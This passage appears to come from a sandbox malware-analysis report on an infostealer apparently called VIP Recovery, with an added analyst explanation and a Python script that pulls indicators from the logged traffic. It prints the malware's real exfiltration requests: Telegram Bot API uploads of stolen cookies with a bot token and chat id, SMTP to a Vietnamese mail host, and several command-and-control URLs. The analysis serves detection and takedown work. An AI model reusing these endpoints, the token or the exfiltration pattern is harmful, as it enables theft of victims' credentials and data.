  2_2_00ED9642: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
  2_2_00ED979D: SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
  2_2_00ED9B2B: FindFirstFileW,Sleep,FindNextFileW,FindClose
  2_2_00ED5C97: FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\svchost.exe (process 3); code functions with inlined nop sleds:
  3_2_080ACCD0: 4x nop then jmp 080ACF7Ch
  3_2_080A0040: 4x nop then mov dword ptr [ebp-14h], 00000000h
  3_2_080AF840: 4x nop then jmp 080AFAECh
  3_2_080A0856: 4x nop then mov dword ptr [ebp-14h], 00000000h
  3_2_080AD128: 4x nop then jmp 080AD3D4h
  3_2_080A3134: 4x nop then jmp 080A3206h
  3_2_080A2580: 4x nop then jmp 080A2834h
  3_2_080AD580: 4x nop then jmp 080AD82Ch
  3_2_080A2DDA: 4x nop then jmp 080A3206h
  3_2_080AD9D8: 4x nop then jmp 080ADC84h
  3_2_080A2DE8: 4x nop then jmp 080A3206h
  3_2_080ADE30: 4x nop then jmp 080AE0DCh
  3_2_080A0676: 4x nop then mov dword ptr [ebp-14h], 00000000h
  3_2_080AE288: 4x nop then jmp 080AE534h
  3_2_080AE6E0: 4x nop then jmp 080AE98Ch
  3_2_080AEB38: 4x nop then jmp 080AEDE4h
  3_2_080A0B30: 4x nop then jmp 080A0D10h
  3_2_080A0B30: 4x nop then jmp 080A169Ah
  3_2_080AEF90: 4x nop then jmp 080AF23Ch
  3_2_080AF3E8: 4x nop then jmp 080AF694h
Source: C:\Windows\SysWOW64\svchost.exe (process 6); code functions with inlined nop sleds:
  6_2_092A2580: 4x nop then jmp 092A2834h
  6_2_092A2DE8: 4x nop then jmp 092A3206h
  6_2_092AD9D8: 4x nop then jmp 092ADC84h
  6_2_092A0B30: 4x nop then jmp 092A0D10h
  6_2_092A0B30: 4x nop then jmp 092A169Ah
  6_2_092AD128: 4x nop then jmp 092AD3D4h
  6_2_092A3134: 4x nop then jmp 092A3206h
  6_2_092AD580: 4x nop then jmp 092AD82Ch
  6_2_092A2DE2: 4x nop then jmp 092A3206h
  6_2_092A31C9: 4x nop then jmp 092A3206h
  6_2_092A0040: 4x nop then mov dword ptr [ebp-14h], 00000000h
  6_2_092AF840: 4x nop then jmp 092AFAECh
  6_2_092A0856: 4x nop then mov dword ptr [ebp-14h], 00000000h
  6_2_092ACCD0: 4x nop then jmp 092ACF7Ch
  6_2_092AEB38: 4x nop then jmp 092AEDE4h
  6_2_092AEF90: 4x nop then jmp 092AF23Ch
  6_2_092AF3E8: 4x nop then jmp 092AF694h
  6_2_092ADE30: 4x nop then jmp 092AE0DCh
  6_2_092A0676: 4x nop then mov dword ptr [ebp-14h], 00000000h
  6_2_092AE288: 4x nop then jmp 092AE534h
  6_2_092AE6E0: 4x nop then jmp 092AE98Ch

              Networking

              barindex
               Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 118.69.190.131 587
               Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 158.101.44.242 80
               Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 149.154.167.220 443
               Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 188.114.97.3 443
               Source: unknown | DNS query: name: api.telegram.org
               Source: Yara match | File source: 6.3.svchost.exe.346f000.0.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 3.2.svchost.exe.3174f2e.1.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 3.2.svchost.exe.7730f20.3.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 3.2.svchost.exe.7b00000.4.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 6.2.svchost.exe.7b40000.3.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 6.2.svchost.exe.3574f2e.1.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 3.3.svchost.exe.305af20.1.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 3.3.svchost.exe.305a000.0.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 6.2.svchost.exe.7b40f20.2.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 6.2.svchost.exe.7f00000.4.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 3.2.svchost.exe.7730000.2.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 6.3.svchost.exe.346ff20.1.raw.unpack, type: UNPACKEDPE
               Source: Yara match | File source: 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
               Source: Yara match | File source: 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
               Source: global traffic | TCP traffic: 192.168.2.5:49734 -> 118.69.190.131:587
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
               Source: global traffic | HTTP traffic detected (5 identical requests): GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
               Source: global traffic | HTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038 | Host: api.telegram.org | Content-Length: 1257 | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
               Source: global traffic | HTTP traffic detected (5 identical requests): GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dcae9abfa21153 | Host: api.telegram.org | Content-Length: 1257 | Connection: Keep-Alive
               Source: Joe Sandbox View | IP Address: 149.154.167.220
               Source: Joe Sandbox View | IP Address: 188.114.97.3
               Source: Joe Sandbox View | IP Address: 188.114.97.3
               Source: Joe Sandbox View | IP Address: 158.101.44.242
               Source: Joe Sandbox View | ASN Name: TELEGRAMRU
               Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
               Source: Joe Sandbox View | ASN Name: FPT-AS-APTheCorporationforFinancingPromotingTechnolo
               Source: Joe Sandbox View | ASN Name: ORACLE-BMC-31898US
               Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
               Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
               Source: unknown | DNS query: name: checkip.dyndns.org
               Source: unknown | DNS query: name: reallyfreegeoip.org
               Source: global traffic | TCP traffic: 192.168.2.5:49734 -> 118.69.190.131:587
               Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected (6 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
               Source: global traffic | HTTP traffic detected (4 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected (3 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
               Source: global traffic | HTTP traffic detected (6 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
               Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49705 version: TLS 1.0
               Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49724 version: TLS 1.0
               Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49733 version: TLS 1.0
               Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49737 version: TLS 1.0
               Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (4 identical entries)
               Source: C:\Users\user\Desktop\DSD876543456780000.exe | Code function: 0_2_00C6CE44 InternetReadFile,SetEvent,GetLastError,SetEvent, | 0_2_00C6CE44
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
               Source: global traffic | HTTP traffic detected (5 identical requests): GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected (2 identical requests): GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org
               Source: global traffic | HTTP traffic detected (5 identical requests): GET /xml/8.46.123.33 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2027/07/2024%20/%2004:25:13%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected (6 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
               Source: global traffic | HTTP traffic detected (4 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected (3 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
               Source: global traffic | HTTP traffic detected (6 identical requests): GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
               Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
               Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
               Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
               Source: global traffic | DNS traffic detected: DNS query: mail.vvtrade.vn
               Source: unknown | HTTP traffic detected: POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1 | Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038 | Host: api.telegram.org | Content-Length: 1257 | Connection: Keep-Alive
               Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 25 Jul 2024 01:34:48 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
               Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 25 Jul 2024 01:35:32 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
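Read together, the traffic lines above (and the earlier group of the same requests) show the three outbound channels of this sample. First, victim profiling: GET / to checkip.dyndns.org with the hard-coded "MSIE 6.0" User-Agent to learn the public IP, then GET /xml/<ip> to reallyfreegeoip.org for the country, repeated before each report. Second, the Telegram Bot API: a sendMessage beacon whose bot token and chat_id are both empty, and a sendDocument upload under bot 7339564661 to chat 6443825857 carrying a 1257-byte multipart body captioned "Cookies | user | VIP Recovery". Third, a TCP session to 118.69.190.131:587 (an FPT address in Vietnam, per the ASN list) next to the DNS lookup of mail.vvtrade.vn, that is, SMTP submission. The two nginx 404 responses have a 55-byte JSON body, exactly the length of Telegram's `{"ok":false,"error_code":404,"description":"Not Found"}`, which is what the API returns when the token in the path is missing or invalid, so they fit the empty-token beacons. The parser below is an added example for this page, not code from the sample or from Joe Sandbox: it takes request lines in the report's collapsed form (headers run together with no CRLF) and turns them into the indicators an analyst would pull out. The five input lines are copied from the report; the port table, the host lists and all function names are assumptions of the example.

```python
import re
from typing import Dict, List, Set, Tuple
from urllib.parse import parse_qs

# The report prints a request line with its headers run together (the CRLFs
# are gone), so a header value is cut at the next capitalised header name;
# the hosts here are lower-case and the MSIE User-Agent ends in ')'.
REQUEST_RE = re.compile(r"^(?P<verb>GET|POST) (?P<target>\S+) HTTP/1\.[01](?P<headers>.*)$")
HOST_RE = re.compile(r"Host: (?P<host>[a-z0-9.-]+)")
UA_RE = re.compile(r"User-Agent: (?P<ua>.+?)(?=Host: )")
CLEN_RE = re.compile(r"Content-Length: (?P<len>\d+)")
# Bot API path is /bot<bot_id>:<secret>/<method>; the token may be absent (/bot/sendMessage).
TOKEN_RE = re.compile(r"^/bot(?P<token>(?P<bot_id>\d+):[A-Za-z0-9_-]+)?/(?P<api_method>\w+)$")
TCP_RE = re.compile(r"(?P<src>[\d.]+):(?P<sport>\d+) -> (?P<dst>[\d.]+):(?P<dport>\d+)")

IP_CHECK_HOSTS = {"checkip.dyndns.org", "reallyfreegeoip.org"}   # hosts seen in the report
MAIL_PORTS = {25: "smtp", 465: "smtps", 587: "smtp-submission"}  # assumed labels


def parse_request(line: str) -> Dict[str, object]:
    """Split one 'HTTP traffic detected' request line into fields and classify it."""
    m = REQUEST_RE.match(line.strip())
    if not m:
        raise ValueError(f"not an HTTP request line: {line[:40]!r}")
    headers = m["headers"]
    host_m, ua_m, clen_m = HOST_RE.search(headers), UA_RE.search(headers), CLEN_RE.search(headers)
    path, _, query = m["target"].partition("?")
    params = {k: v[0] for k, v in parse_qs(query, keep_blank_values=True).items()}
    info: Dict[str, object] = {
        "verb": m["verb"],
        "host": host_m["host"] if host_m else "",
        "path": path,
        "user_agent": ua_m["ua"] if ua_m else "",
        "content_length": int(clen_m["len"]) if clen_m else 0,
        "kind": "other",
    }
    if info["host"] in IP_CHECK_HOSTS:
        info["kind"] = "ip_check"            # public IP, then country, before each beacon
    elif info["host"] == "api.telegram.org":
        t = TOKEN_RE.match(path)
        info["kind"] = "telegram_api"
        info["api_method"] = t["api_method"] if t else ""
        info["bot_id"] = t["bot_id"] if t else None   # None: the request carried no token at all
        info["token"] = t["token"] if t else None
        info["chat_id"] = params.get("chat_id", "")
        # sendMessage carries the victim summary in 'text', sendDocument in 'caption'
        info["message"] = params.get("text") or params.get("caption") or ""
    return info


def parse_tcp(line: str) -> Dict[str, object]:
    """Classify a 'TCP traffic: src:port -> dst:port' line by destination port."""
    m = TCP_RE.search(line)
    if not m:
        raise ValueError("no 'src:port -> dst:port' in line")
    port = int(m["dport"])
    return {"dst": m["dst"], "dport": port, "kind": MAIL_PORTS.get(port, "other")}


def summarize(lines: List[str]) -> Dict[str, object]:
    """Reduce a batch of report lines to the indicators worth blocking or hunting."""
    bots: Set[Tuple[str, str]] = set()
    ip_checks: Set[str] = set()
    mail: Set[Tuple[str, int]] = set()
    for line in lines:
        if " -> " in line:
            t = parse_tcp(line)
            if t["kind"] != "other":
                mail.add((str(t["dst"]), int(t["dport"])))
            continue
        r = parse_request(line)
        if r["kind"] == "ip_check":
            ip_checks.add(str(r["host"]))
        elif r["kind"] == "telegram_api" and r["bot_id"]:
            bots.add((str(r["bot_id"]), str(r["chat_id"])))
    return {"telegram_bots": bots, "ip_check_hosts": ip_checks, "mail_exfil": mail}


# Lines copied verbatim from the report above (the last one from a 'TCP traffic' entry).
REPORT_LINES = [
    "POST /bot7339564661:AAFzTB6gEWMndjXYyD5LCn17UEBISRR8wDI/sendDocument?chat_id=6443825857&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dcad0e9d9f0038Host: api.telegram.orgContent-Length: 1257Connection: Keep-Alive",
    "GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:124406%0D%0ADate%20and%20Time:%2025/07/2024%20/%2010:29:04%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20124406%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive",
    "GET /xml/8.46.123.33 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive",
    "GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive",
    "192.168.2.5:49734 -> 118.69.190.131:587",
]

if __name__ == "__main__":
    for key, value in summarize(REPORT_LINES).items():
        print(f"{key}: {sorted(value)}")
```

The (bot_id, chat_id) pair plus the token is what to hand to Telegram for takedown, and the token alone identifies the bot through the public getMe method. The empty-token sendMessage requests cannot have delivered anything; the sendDocument with the populated token is the upload that matters. On the wire, the MSIE 6.0 User-Agent to checkip.dyndns.org followed by the TLS 1.0 handshakes to the Cloudflare address 188.114.97.3:443 listed in this report is the sequence to hunt for, since blocking api.telegram.org outright is rarely an option.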
               Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
               Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
               Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
               Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
               Source: svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://api.telegram.org
               Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://c.pki.goog/r/gsr1.crl0
               Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://c.pki.goog/r/r4.crl0
               Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://c.pki.goog/we1/OuqGbJkzwhU.crl0
               Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
               Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000003.2148911676.0000000007931000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
               Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
               Source: svchost.exe, 00000006.00000003.2598293666.0000000007D24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4472062178.0000000003495000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://i.pki.goog/gsr1.crt0-
               Source: svchost.exe, 00000006.00000002.4471702197.0000000003476000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://i.pki.goog/r4.crt0
               Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://i.pki.goog/we1.crt05
               Source: svchost.exe, 00000003.00000002.4473198929.00000000052C7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000056D9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://mail.vvtrade.vn
               Source: svchost.exe, 00000006.00000002.4471801244.0000000003482000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://o.pki.goog/s/we1/Ges0%
               Source: svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
               Source: svchost.exe, 00000003.00000002.4471960096.0000000003174000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4473198929.0000000005191000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000003.00000002.4478714874.0000000007B00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000002.4477632530.0000000007730000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000003.00000003.2040416661.000000000305A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000003.2180698803.000000000346F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478932034.0000000007F00000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4472271903.0000000003574000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000006.00000002.4478057962.0000000007B40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000006.00000002.4473666032.00000000055A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
